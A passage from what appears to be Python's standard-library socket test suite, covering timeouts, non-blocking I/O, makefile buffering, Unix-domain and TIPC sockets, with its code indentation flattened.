self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
@unittest.skipUnless(thread, 'Threading required for this test.')
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def testSetBlocking(self):
# Testing whether set blocking works
self.serv.setblocking(True)
self.assertIsNone(self.serv.gettimeout())
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error setting non-blocking mode.")
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# reinit server socket
self.serv.close()
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM |
socket.SOCK_NONBLOCK)
self.port = support.bind_port(self.serv)
self.serv.listen()
# actual testing
start = time.time()
try:
self.serv.accept()
except OSError:
pass
end = time.time()
self.assertTrue((end - start) < 1.0, "Error creating with non-blocking mode.")
def _testInitNonBlocking(self):
pass
def testInheritFlags(self):
# Issue #7995: when calling accept() on a listening socket with a
# timeout, the resulting socket should not be non-blocking.
self.serv.settimeout(10)
try:
conn, addr = self.serv.accept()
message = conn.recv(len(MSG))
finally:
conn.close()
self.serv.settimeout(None)
def _testInheritFlags(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
time.sleep(0.5)
self.cli.send(MSG)
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(0)
try:
conn, addr = self.serv.accept()
except OSError:
pass
else:
self.fail("Error trying to do non-blocking accept.")
read, write, err = select.select([self.serv], [], [])
if self.serv in read:
conn, addr = self.serv.accept()
self.assertIsNone(conn.gettimeout())
conn.close()
else:
self.fail("Error trying to do accept after select.")
def _testAccept(self):
time.sleep(0.1)
self.cli.connect((HOST, self.port))
def testConnect(self):
# Testing non-blocking connect
conn, addr = self.serv.accept()
conn.close()
def _testConnect(self):
self.cli.settimeout(10)
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
conn.setblocking(0)
try:
msg = conn.recv(len(MSG))
except OSError:
pass
else:
self.fail("Error trying to do non-blocking recv.")
read, write, err = select.select([conn], [], [])
if conn in read:
msg = conn.recv(len(MSG))
conn.close()
self.assertEqual(msg, MSG)
else:
self.fail("Error during select call to non-blocking socket.")
def _testRecv(self):
self.cli.connect((HOST, self.port))
time.sleep(0.1)
self.cli.send(MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid cloding the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = [ errno.ECONNREFUSED, ]
if hasattr(errno, 'ENETUNREACH'):
expected_errnos.append(errno.ENETUNREACH)
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
@unittest.skipUnless(thread, 'Threading required for this test.')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
@unittest.skipUnless(thread, 'Threading required for this test.')
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# plaform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
try:
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
sock.bind(path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
if not os.path.isfile("/proc/modules"):
return False
with open("/proc/modules") as f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
@unittest.skipUnless(thread, 'Threading required for this test.')
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertTrue(s.type & socket.SOCK_CLOEXEC)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
